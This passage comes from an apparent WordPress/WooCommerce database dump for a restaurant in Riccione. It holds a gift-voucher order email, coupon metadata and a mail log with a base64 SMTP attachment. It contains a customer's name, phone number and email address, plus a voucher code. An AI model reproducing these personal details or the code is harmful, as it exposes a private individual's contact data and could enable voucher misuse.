#=\r\ne4e4e4; vertical-align: middle; padding: 12px; text-align: left;\">Quanti=\r\nt=C3=A0</th>=0A=09=09=09=09<th class=3D\"td\" scope=3D\"col\" style=3D\"color=\r\n: #737373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 1=\r\n2px; text-align: left;\">Prezzo</th>=0A=09=09=09</tr>=0A=09=09</thead>=0A=\r\n=09=09<tbody>=0A=09=09=09=09<tr class=3D\"order_item\">=0A=09=09<td class=\r\n=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; padding: 12p=\r\nx; text-align: left; vertical-align: middle; font-family: \'Helvetica Neu=\r\ne\', Helvetica, Roboto, Arial, sans-serif; word-wrap: break-word;\">=0A=09=\r\n=09Regala cena: Men=C3=B9 Creativo per 2 persone + Bevande<ul class=3D\"w=\r\nc-item-meta\" style=3D\"font-size: small; margin: 1em 0 0; padding: 0; lis=\r\nt-style: none;\">=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<stro=\r\nng class=3D\"wc-item-meta-label\" style=3D\"float: left; margin-right: .25e=\r\nm; clear: both;\">To:</strong> <p style=3D\"margin: 0;\">Michela</p>=0A</li=\r\n>=0A<li style=3D\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-=\r\nitem-meta-label\" style=3D\"float: left; margin-right: .25em; clear: both;=\r\n\">From:</strong> <p style=3D\"margin: 0;\">Gaia</p>=0A</li>=0A<li style=3D=\r\n\"margin: 0.5em 0 0; padding: 0;\">=0A<strong class=3D\"wc-item-meta-label\"=\r\n style=3D\"float: left; margin-right: .25em; clear: both;\">Message:</stro=\r\nng> <p style=3D\"margin: 0;\">=E2=9D=A4=EF=B8=8F</p>=0A</li>=0A</ul>=09=09=\r\n</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; border: 1px soli=\r\nd #e4e4e4; padding: 12px; text-align: left; vertical-align: middle; font=\r\n-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=\r\n=09=091=09=09</td>=0A=09=09<td class=3D\"td\" style=3D\"color: #737373; bor=\r\nder: 1px solid #e4e4e4; padding: 12px; text-align: left; vertical-align:=\r\n middle; font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-s=\r\nerif;\">=0A=09=09=09<span class=3D\"woocommerce-Price-amount amount\">125,0=\r\n0<span class=3D\"woocommerce-Price-currencySymbol\">=E2=82=AC</span></span=\r\n>=09=09</td>=0A=09</tr>=0A=09=09=09<tr>=0A=09=09=09<td colspan=3D\"3\" sty=\r\nle=3D\"padding: 12px; text-align: left; vertical-align: middle; font-fami=\r\nly: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;\">=0A=09=09=\r\n=09=09<p style=3D\"margin: 0 0 16px;\">Escluso bevande</p>=0A=09=09=09</td=\r\n>=0A=09=09</tr>=0A=09=09=0A=09=09</tbody>=0A=09=09<tfoot>=0A=09=09=09=09=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" cols=\r\npan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-a=\r\nlign: middle; padding: 12px; text-align: left; border-top-width: 4px;\">S=\r\nubtotale:</th>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737=\r\n373; border: 1px solid #e4e4e4; vertical-align: middle; padding: 12px; t=\r\next-align: left; border-top-width: 4px;\"><span class=3D\"woocommerce-Pric=\r\ne-amount amount\">125,00<span class=3D\"woocommerce-Price-currencySymbol\">=\r\n=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=\r\n=09=09=09=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" cols=\r\npan=3D\"2\" style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-a=\r\nlign: middle; padding: 12px; text-align: left;\">Metodo di pagamento:</th=\r\n>=0A=09=09=09=09=09=09<td class=3D\"td\" style=3D\"color: #737373; border:=\r\n 1px solid #e4e4e4; vertical-align: middle; padding: 12px; text-align: l=\r\neft;\">PayPal</td>=0A=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=\r\n=09<tr>=0A=09=09=09=09=09=09<th class=3D\"td\" scope=3D\"row\" colspan=3D\"2\"=\r\n style=3D\"color: #737373; border: 1px solid #e4e4e4; vertical-align: mid=\r\ndle; padding: 12px; text-align: left;\">Totale:</th>=0A=09=09=09=09=09=09=\r\n<td class=3D\"td\" style=3D\"color: #737373; border: 1px solid #e4e4e4; ver=\r\ntical-align: middle; padding: 12px; text-align: left;\"><span class=3D\"wo=\r\nocommerce-Price-amount amount\">125,00<span class=3D\"woocommerce-Price-cu=\r\nrrencySymbol\">=E2=82=AC</span></span></td>=0A=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09</tfoot>=0A=09</table>=0A</div>=0A=0A=0A<p style=3D\"ma=\r\nrgin: 0 0 16px;\"><strong>Quanti adulti?:</strong> 1</p>=0A<table id=3D\"a=\r\nddresses\" cellspacing=3D\"0\" cellpadding=3D\"0\" border=3D\"0\" style=3D\"widt=\r\nh: 100%; vertical-align: top; margin-bottom: 40px; padding: 0;\">=0A=09<t=\r\nr>=0A=09=09<td valign=3D\"top\" width=3D\"50%\" style=3D\"text-align: left; f=\r\nont-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif; bord=\r\ner: 0; padding: 0;\">=0A=09=09=09<h2 style=3D\'color: #557da1; display: bl=\r\nock; font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif=\r\n; font-size: 18px; font-weight: bold; line-height: 130%; margin: 0 0 18p=\r\nx; text-align: left;\'>Indirizzo di fatturazione</h2>=0A=0A=09=09=09<addr=\r\ness class=3D\"address\" style=3D\"padding: 12px; color: #737373; border: 1p=\r\nx solid #e4e4e4;\">=0A=09=09=09=09Gaia Marchesini=09=09=09=09=09=09=09=09=\r\n=09<br><a href=3D\"tel:3398328956\" style=3D\"color: #557da1; font-weight:=\r\n normal; text-decoration: underline;\">3398328956</a>=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09<br>gaia.marchesini@gmail.com=09=09=09=09=09=09=09<=\r\n/address>=0A=09=09</td>=0A=09=09=09</tr>=0A</table>=0A<p style=3D\"margin=\r\n: 0 0 16px;\">Grazie per aver usato www.ristorantesolymar.it.</p>=0A=09=\r\n=09=09=09=09=09=09=09=09=09=09=09=09=09=09</div>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09=09=09=09</tr=\r\n>=0A=09=09=09=09=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=\r\n=09=09=09=09=09<!-- End Content -->=0A=09=09=09=09=09=09=09=09=09=09=09<=\r\n/td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09=09=09=09=\r\n</table>=0A=09=09=09=09=09=09=09=09=09<!-- End Body -->=0A=09=09=09=09=\r\n=09=09=09=09</td>=0A=09=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</tab=\r\nle>=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=09=09=09<tr>=0A=09=\r\n=09=09=09=09<td align=3D\"center\" valign=3D\"top\">=0A=09=09=09=09=09=09<!-=\r\n- Footer -->=0A=09=09=09=09=09=09<table border=3D\"0\" cellpadding=3D\"10\"=\r\n cellspacing=3D\"0\" width=3D\"600\" id=3D\"template_footer\">=0A=09=09=09=09=\r\n=09=09=09<tr>=0A=09=09=09=09=09=09=09=09<td valign=3D\"top\" style=3D\"padd=\r\ning: 0; border-radius: 6px;\">=0A=09=09=09=09=09=09=09=09=09<table border=\r\n=3D\"0\" cellpadding=3D\"10\" cellspacing=3D\"0\" width=3D\"100%\">=0A=09=09=09=\r\n=09=09=09=09=09=09=09<tr>=0A=09=09=09=09=09=09=09=09=09=09=09<td colspan=\r\n=3D\"2\" valign=3D\"middle\" id=3D\"credit\" style=3D\'border-radius: 6px; bord=\r\ner: 0; color: #969696; font-family: \"Helvetica Neue\", Helvetica, Roboto,=\r\n Arial, sans-serif; font-size: 12px; line-height: 150%; text-align: cent=\r\ner; padding: 24px 0;\'>=0A=09=09=09=09=09=09=09=09=09=09=09=09<p style=3D=\r\n\"margin: 0 0 16px;\">Sol Y Mar, ristorante a Riccione</p>=0A=09=09=09=09=\r\n=09=09=09=09=09=09=09</td>=0A=09=09=09=09=09=09=09=09=09=09</tr>=0A=09=\r\n=09=09=09=09=09=09=09=09</table>=0A=09=09=09=09=09=09=09=09</td>=0A=09=\r\n=09=09=09=09=09=09</tr>=0A=09=09=09=09=09=09</table>=0A=09=09=09=09=09=\r\n=09<!-- End Footer -->=0A=09=09=09=09=09</td>=0A=09=09=09=09</tr>=0A=09=\r\n=09=09</table>=0A=09=09</div>=0A=09</body>=0A</html>=0A\r\n.\r\n250 OK id=1k2wap-0008Ui-24\r\n'),(21352,1054,'discount_type','fixed_cart'),(21353,1054,'coupon_amount','125'),(21354,1054,'individual_use','no'),(21355,1054,'usage_limit','1'),(21356,1054,'usage_limit_per_user','0'),(21357,1054,'limit_usage_to_x_items',NULL),(21358,1054,'usage_count','0'),(21359,1054,'date_expires','1612051200'),(21360,1054,'free_shipping','yes'),(21361,1054,'exclude_sale_items','no'),(21362,1054,'apply_before_tax','no'),(21363,1054,'minimum_amount',''),(21364,1054,'maximum_amount',''),(21365,1054,'exclude_product_ids',''),(21366,1054,'exclude_product_categories',''),(21367,1054,'product_ids',''),(21368,1054,'product_categories','a:0:{}'),(21369,1054,'mwb_wgm_giftcard_coupon','1051'),(21370,1054,'mwb_wgm_giftcard_coupon_unique','online'),(21371,1054,'mwb_wgm_giftcard_coupon_product_id','472'),(21372,1054,'mwb_wgm_giftcard_coupon_mail_to','Michela'),(21373,1051,'1051#378','a:1:{i:0;s:18:\"solymarcouponI5YYE\";}'),(21374,1055,'success','1'),(21375,1055,'from_header','ristorante a Riccione <notifiche@ristorantesolymar.it>'),(21376,1055,'to_header','gaia.marchesini@gmail.com'),(21377,1055,'bcc_header','gaia.marchesini@gmail.com'),(21378,1055,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(21379,1055,'original_to','gaia.marchesini@gmail.com'),(21380,1055,'original_subject','Sol Y Mar, ristorante a Riccione'),(21381,1055,'original_message','<!DOCTYPE html>\n<html>\n<head><meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"></head>\n<body style=\"padding: 0;\">\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto; background-color: #ff9898; border-spacing: 10px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px;\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: 0 auto; width: 100%; padding: 10px 0px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0; text-align: left;\"><a style=\"font-weight: normal; text-decoration: none; color: #ffffff; margin-left: 10px;\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></a></td>\r\n<td style=\"padding: 10px 0; text-align: center;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center; padding: 2px 0px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; margin: auto;\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center; font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555;\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px;\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top; width: 50%;\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px; text-align: center; width: 50%;\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/be-the-reason.jpg\" width=\"100%\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif; font-size: 15px; line-height: 20px; color: #555555; padding: 10px; text-align: left; word-break: break-word;\">\r\n<p style=\"min-height: 180px;\">❤️</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">Da :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Gaia</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\n<span style=\"float: left; padding: 0 3% 0 0; text-align: right;\">A :</span><span style=\"width: 75%; float: left; word-break: break-all;\">Michela</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px; color: #373737;\">\r\n<h3 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; margin: 16px 0 8px; text-align: left; font-size: 30px; font-family: Arial, Helvetica, sans-serif;\"><span class=\"woocommerce-Price-amount amount\">125,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center; background-color: #ffd5d5; padding: 10px;\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff; border-spacing: 20px; border: 2px dashed #ffffff;\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px; font-family: sans-serif; line-height: 20px; color: #ff9898; text-align: center; border: 3px;\">\r\n<h2 style=\"color: #557da1; display: block; font-weight: bold; line-height: 130%; padding: 0px; margin: 10px 0px; font-family: Arial, Helvetica, sans-serif; font-size: 15px; text-align: center;\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px; font-weight: bold; margin: 0px; text-align: center;\"><img class=\"mwb_wgm_coupon_img\" id=\"1596546179www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1596546179solymarcouponI5YYE.png\" style=\"border: none; display: inline-block; font-size: 14px; font-weight: bold; height: auto; outline: none; text-decoration: none; text-transform: capitalize; vertical-align: middle; margin-right: 10px; max-width: 100%;\"></p>\r\n<span style=\"font-size: 15px; text-align: center; padding: 10px 0px;\">(Scadenza. 31/01/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center; padding: 15px; color: #ffffff; background-color: #ff9898; font-size: 18px; font-family: Arial, Helvetica, sans-serif;\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1; font-weight: normal; text-decoration: underline;\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n</body>\n</html>\n'),(21382,1055,'original_headers','[\"Bcc:gaia.marchesini@gmail.com\"]'),(21383,1055,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\nzTtk8rZpm3dN00zT1f+tZ2/99FskYYWUzQhRbRIpn/NI471TeO9N5qbq+XY+x4s6akbO/gdo\r\n8T/Av8U9sdVkzD2chlM2U+xsyhm8DzbkNczLDcw02vwHxGf57AplbmRzdHJlYW0KZW5kb2Jq\r\nCjQ4IDAgb2JqCjEyMzYKZW5kb2JqCjQ2IDAgb2JqCjw8IC9UeXBlIC9Gb250Ci9TdWJ0eXBl\r\nIC9DSURGb250VHlwZTIKL0Jhc2VGb250IC9Ecm9pZEFyYWJpY0t1ZmkKL0NJRFN5c3RlbUlu\r\nZm8gPDwgL1JlZ2lzdHJ5IChBZG9iZSkgL09yZGVyaW5nIChJZGVudGl0eSkgL1N1cHBsZW1l\r\nbnQgMCA+PgovRm9udERlc2NyaXB0b3IgNDQgMCBSCi9DSURUb0dJRE1hcCAvSWRlbnRpdHkK\r\nL1cgWzAgWzU5NSAzMzcgXQpdCj4+CmVuZG9iago0NyAwIG9iago8PCAvTGVuZ3RoIDM2OCA+\r\nPgpzdHJlYW0KL0NJREluaXQgL1Byb2NTZXQgZmluZHJlc291cmNlIGJlZ2luCjEyIGRpY3Qg\r\nYmVnaW4KYmVnaW5jbWFwCi9DSURTeXN0ZW1JbmZvIDw8IC9SZWdpc3RyeSAoQWRvYmUpIC9P\r\ncmRlcmluZyAoVUNTKSAvU3VwcGxlbWVudCAwID4+IGRlZgovQ01hcE5hbWUgL0Fkb2JlLUlk\r\nZW50aXR5LVVDUyBkZWYKL0NNYXBUeXBlIDIgZGVmCjEgYmVnaW5jb2Rlc3BhY2VyYW5nZQo8\r\nMDAwMD4gPEZGRkY+CmVuZGNvZGVzcGFjZXJhbmdlCjIgYmVnaW5iZnJhbmdlCjwwMDAwPiA8\r\nMDAwMD4gPDAwMDA+CjwwMDAxPiA8MDAwMT4gPDAwMjA+CmVuZGJmcmFuZ2UKZW5kY21hcApD\r\nTWFwTmFtZSBjdXJyZW50ZGljdCAvQ01hcCBkZWZpbmVyZXNvdXJjZSBwb3AKZW5kCmVuZAoK\r\nZW5kc3RyZWFtCmVuZG9iagoxNSAwIG9iago8PCAvVHlwZSAvRm9udAovU3VidHlwZSAvVHlw\r\nZTAKL0Jhc2VGb250IC9Ecm9pZEFyYWJpY0t1ZmkKL0VuY29kaW5nIC9JZGVudGl0eS1ICi9E\r\nZXNjZW5kYW50Rm9udHMgWzQ2IDAgUl0KL1RvVW5pY29kZSA0NyAwIFI+PgplbmRvYmoKNDkg\r\nMCBvYmoKPDwgL1R5cGUgL0ZvbnREZXNjcmlwdG9yCi9Gb250TmFtZSAvUVhCQUFBK05pbWJ1\r\nc1NhbnMtUmVndWxhcgovRmxhZ3MgNCAKL0ZvbnRCQm94IFstMjEwIC0yOTkgMTAzMiAxMDc1\r\nIF0KL0l0YWxpY0FuZ2xlIDAgCi9Bc2NlbnQgNzI5IAovRGVzY2VudCAtMjcxIAovQ2FwSGVp\r\nZ2h0IDcyOSAKL1N0ZW1WIDUwIAovRm9udEZpbGUyIDUwIDAgUgo+PgplbmRvYmoKNTAgMCBv\r\nYmoKPDwKL0xlbmd0aDEgNDE2OCAKL0xlbmd0aCA1MyAwIFIKL0ZpbHRlciAvRmxhdGVEZWNv\r\nZGUKPj4Kc3RyZWFtCnicjRdpVFNn9rtvCTguGFYZt4RAIsTIEpLIomDYBQKGVansYZMQBBQC\r\nFsooUkVEtCCI1op2xlJsrYX2jD11ao+22lNbaJs6jqfHWk+dmdqZcRZbp8Jj7nsJHtvOj37w\r\nvXfvffe73/3u9t0QIIQ4k2cITUhaRmBI/bZ3dyFlH87C8mpr2VveaQkIf0vI3PMVpqJS05Ik\r\nJSHzTiNNW4GEOW87uSL+JeK+FeaGJmvf3ChC5jOIP1NtKSkKmlHdQpyXqTcXNdUSXxKH+BXE\r\nJTVFZlPDctNHiP+FEKqQ0FQbHCAsYai9VC5yJNvfkE9CQIM4fpodVCev9uzISs4xkGgiecRQ\r\nN7h/kiuMGpSFhBwXOBnqI343PCGQfs5AZbI24oFSRTg83F09Pb3UchyaUK1Wq4M7hpYclSqn\r\nxbA1rjLB1zehMo61ld2b4ppaZsijb0rN977/747mh9/fs6C04plJ5iH7d7IGpfEiFHJfhSCV\r\nYllPTw+RyEkkkomQLNfJcBtPT3WIVsfvgqx+yK8TtsQvzGWg57jMXcvNvL3jUlcigBzquzsg\r\nYtWqrk0tpzUBCmYcAlSp06O7bUl+kXqAFwe4vXEFmVRgTkvqa+/QzHI/jX/A4vYOgMj6k6Xc\r\nP5KL/Rqz11p8pMtgzbrArXHlByO3VEWsXmJ4tnTvRaVJ7J+ardsc4wswdAjPETUzSU8y6WS5\r\n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\r\nZHN0cmVhbQplbmRvYmoKNTMgMCBvYmoKMzExNgplbmRvYmoKNTEgMCBvYmoKPDwgL1R5cGUg\r\nL0ZvbnQKL1N1YnR5cGUgL0NJREZvbnRUeXBlMgovQmFzZUZvbnQgL05pbWJ1c1NhbnMtUmVn\r\ndWxhcgovQ0lEU3lzdGVtSW5mbyA8PCAvUmVnaXN0cnkgKEFkb2JlKSAvT3JkZXJpbmcgKElk\r\nZW50aXR5KSAvU3VwcGxlbWVudCAwID4+Ci9Gb250RGVzY3JpcHRvciA0OSAwIFIKL0NJRFRv\r\nR0lETWFwIC9JZGVudGl0eQovVyBbMCBbMjc2IDMzMCA2NjIgNDk2IDU1MiA1NTIgNTUyIDU1\r\nMiA0OTYgMjc2IDI3NiA1NTIgNTUyIDI3NiA1NTIgNTUyIDMzMCA2MDYgMzMwIDU1MiA0OTYg\r\nMjIwIDIyMCA1NTIgODI2IDI3NiAxODkgNTUyIDcxNiA1NTIgNjYyIDQ5NiBdCl0KPj4KZW5k\r\nb2JqCjUyIDAgb2JqCjw8IC9MZW5ndGggNTgxID4+CnN0cmVhbQovQ0lESW5pdCAvUHJvY1Nl\r\ndCBmaW5kcmVzb3VyY2UgYmVnaW4KMTIgZGljdCBiZWdpbgpiZWdpbmNtYXAKL0NJRFN5c3Rl\r\nbUluZm8gPDwgL1JlZ2lzdHJ5IChBZG9iZSkgL09yZGVyaW5nIChVQ1MpIC9TdXBwbGVtZW50\r\nIDAgPj4gZGVmCi9DTWFwTmFt